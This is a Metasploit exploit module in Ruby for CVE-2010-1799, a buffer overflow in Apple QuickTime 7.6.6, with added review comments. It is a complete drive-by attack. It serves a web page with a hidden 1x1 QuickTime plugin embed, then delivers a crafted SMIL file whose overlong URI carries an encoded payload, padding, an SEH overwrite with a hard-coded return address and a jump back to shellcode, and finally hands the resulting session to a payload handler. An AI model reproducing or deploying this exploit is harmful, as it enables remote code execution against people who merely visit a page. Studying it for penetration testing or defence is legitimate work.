Path: blob/master/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Browser exploit module for the Apple QuickTime 7.6.6 SMIL URI overflow
# (CVE-2010-1799, see 'References' below). The module runs an HTTP server
# (HttpServer::HTML) and answers two kinds of request from on_request_uri:
# an HTML landing page that embeds the QuickTime plugin and points it back
# at this server, and a SMIL document whose <img src> carries the overlong
# URI. SEH record construction comes from Msf::Exploit::Seh.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking # needs more testing/targets to be Great

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::Seh

  # include Msf::Exploit::Remote::BrowserAutopwn
  # autopwn_info({
  #   :os_name => OperatingSystems::Match::WINDOWS,
  #   :javascript => true,
  #   :rank => NormalRanking, # reliable memory corruption
  #   :vuln_test => nil,
  # })

  # Module metadata only; all request handling lives in on_request_uri.
  #
  # @param info [Hash] caller-supplied info, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Apple QuickTime 7.6.6 Invalid SMIL URI Buffer Overflow',
        'Description' => %q{
          This module exploits a buffer overflow in Apple QuickTime
          7.6.6. When processing a malformed SMIL uri, a stack-based buffer
          overflow can occur when logging an error message.
        },
        'Author' => [
          'Krystian Kloskowski', # original discovery
          'jduck' # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2010-1799' ],
          [ 'OSVDB', '66636'],
          [ 'BID', '41962' ],
          [ 'URL', 'http://web.archive.org/web/20100729143247/http://secunia.com:80/advisories/40729' ],
          [ 'URL', 'http://support.apple.com/kb/HT4290' ]
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'process',
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
        },
        'Payload' => {
          # 716 is the `off` used in on_request_uri, 63 is the length of the
          # `start` string there and 8 is the "xxxxx://" scheme prefix; the
          # remaining 5 is presumably reserved for the trailing jmp — confirm.
          'Space' => 640, # 716 - 63 - 8 - 5
          # Bytes that must not appear in the encoded payload because they
          # would terminate or alter the URI/SMIL attribute it is embedded in.
          'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40\x5c",
        },
        'Platform' => 'win',
        'Targets' => [
          # [ 'Automatic', { } ],
          [
            'Apple QuickTime Player 7.6.6',
            {
              'Ret' => 0x66801042 # p/p/r from QuickTime.qts (v7.66.71.0)
            }
          ],
        ],
        'Privileged' => false,
        'DisclosureDate' => '2010-08-12',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # HTTP request handler. When the User-Agent matches /QuickTime/i or the
  # request URI ends in ".smil", the SMIL document carrying the overflow is
  # sent; any other request gets the HTML landing page whose <OBJECT>/<EMBED>
  # make the QuickTime plugin fetch ".smil"/".qtl" resources from this same
  # server. Returns early without answering if no payload can be generated.
  #
  # @param client the connected client; passed to regenerate_payload,
  #   send_response and handler
  # @param request the parsed request; its 'User-Agent' header and uri are read
  def on_request_uri(client, request)
    # NOTE(review): `== nil` reads more idiomatically as `.nil?`; left as-is.
    return if ((p = regenerate_payload(client)) == nil)

    # `or` binds looser than `=~`, so this is (ua =~ ...) or (uri =~ ...);
    # `||` would be the idiomatic spelling. `$` matches at a line end rather
    # than the end of the string (`\z`), which is acceptable here but worth
    # knowing when this pattern is reused.
    if (request['User-Agent'] =~ /QuickTime/i or request.uri =~ /\.smil$/)
      print_status("Sending exploit SMIL (target: #{target.name})")

      # This is all basically filler on the browser target because we can't
      # expect the SEH to be in a reliable place across multiple browsers.
      # Heap spray ftw.

      # Offset within the logged buffer at which the SEH record is placed;
      # the 'Space' arithmetic in initialize is derived from this value.
      off = 716
      # Prefix the vulnerable logger appears to write ahead of the URI
      # (the error message named in 'Description'); its length (63) is
      # subtracted below so the SEH record lands at `off` — confirm against
      # the target build.
      start = "cHTTPDhlr_SetURL - url doesn't start with http:// or http1:// '"

      # Random 5-char scheme; with "://" this is the 8-byte prefix of the URI.
      scheme = rand_text_alphanumeric(5)

      sploit = ''
      sploit << scheme
      sploit << "://"

      # payload
      sploit << p.encoded

      # pad to SEH
      # Padding is sized so that start.length + sploit.length == off here.
      sploit << rand_text_english(off - sploit.length - start.length)

      # seh frame
      # 8-byte record (next/handler) built around target.ret by Msf::Exploit::Seh.
      sploit << generate_seh_record(target.ret)

      # jmp back to payload
      # Backward distance from the jmp (which follows the SEH record at off)
      # toward the payload, expressed in terms of the scheme prefix and the
      # logged prefix length; presumably tuned to the target's stack layout —
      # verify before changing either constant.
      distance = off + 8 - (8 + start.length)
      sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string

      # force exception while writing
      # 15 KiB of trailing filler.
      sploit << rand_text(1024) * 15

      # The overlong URI goes into the <img src> attribute of a minimal SMIL
      # document served as application/smil.
      smil = %Q|<smil xmlns="http://www.w3.org/2001/SMIL20/Language">
<body>
<img src="#{sploit}" />
</body>
</smil>
|
      send_response(client, smil, { 'Content-Type' => "application/smil" })

    else
      print_status("Sending initial HTML")

      # NOTE(review): `shellcode` is assigned but never used in this branch;
      # the payload reaches the client only through the SMIL response above.
      shellcode = Rex::Text.to_unescape(p.encoded)
      # Absolute URL of this server as the client should reach it. When
      # SRVHOST is the wildcard address, pick the local address that routes to
      # the client's peer address instead of advertising 0.0.0.0.
      url = ((datastore['SSL']) ? "https://" : "http://")
      url << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(client.peerhost) : datastore['SRVHOST'])
      url << ":" + datastore['SRVPORT'].to_s
      url << get_resource

      # Random 4-char basename shared by the .smil and .qtl resource names.
      fname = rand_text_alphanumeric(4)

      # OBJECT references the .smil resource and EMBED the .qtl one. The .smil
      # request matches the uri check in this handler; the .qtl request
      # presumably matches through the QuickTime User-Agent — confirm.
      content = "<html><body>"
      content << <<-ENDEMBED
<OBJECT
CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B"
WIDTH="1"
HEIGHT="1"
CODEBASE="http://www.apple.com/qtactivex/qtplugin.cab">
<PARAM name="SRC" VALUE = "#{url}/#{fname}.smil">
<PARAM name="QTSRC" VALUE = "#{url}/#{fname}.smil">
<PARAM name="AUTOPLAY" VALUE = "true" >
<PARAM name="TYPE" VALUE = "video/quicktime" >
<PARAM name="TARGET" VALUE = "myself" >
<EMBED
SRC = "#{url}/#{fname}.qtl"
QTSRC = "#{url}/#{fname}.qtl"
TARGET = "myself"
WIDTH = "1"
HEIGHT = "1"
AUTOPLAY = "true"
PLUGIN = "quicktimeplugin"
TYPE = "video/quicktime"
CACHE = "false"
PLUGINSPAGE= "http://www.apple.com/quicktime/download/" >
</EMBED>
</OBJECT>
ENDEMBED
      content << "</body></html>"

      send_response(client, content, { 'Content-Type' => "text/html" })
    end

    # Handle the payload
    handler(client)
  end
end